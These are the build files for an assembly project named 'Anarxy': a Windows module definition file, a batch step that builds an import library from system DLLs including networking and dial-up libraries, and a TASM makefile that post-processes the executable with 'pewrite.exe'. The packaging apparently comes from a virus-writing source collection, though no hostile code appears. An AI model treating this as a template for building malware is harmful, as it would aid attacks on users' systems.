ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ANARXY.DEF]ÄÄÄ NAME ANARXY WINDOWCOMPAT DESCRIPTION 'Anarxy' CODE PRELOAD MOVEABLE DISCARDABLE DATA PRELOAD MOVEABLE MULTIPLE EXETYPE WINDOWS HEAPSIZE 131072 STACKSIZE 131072 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ANARXY.DEF]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IMP.BAT]ÄÄÄ implib.exe import32.lib kernel32.dll user32.dll wininet.dll msvcrt.dll wsock32.dll advapi32.dll rasapi32.dll ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IMP.BAT]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ NAME = anarxy OBJS = $(NAME).obj DEF = $(NAME).def !if $d(DEBUG) TASMDEBUG=/zi /m LINKDEBUG=/v !else TASMDEBUG=/m LINKDEBUG= !endif IMPORT=import32.lib $(NAME).EXE: $(OBJS) $(DEF) tlink32 /Tpe /aa /c /x $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF) pewrite.exe $(NAME).exe del $(OBJS) .asm.obj: tasm32 $(TASMDEBUG) /ml /i..\..\includes $&.asm ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ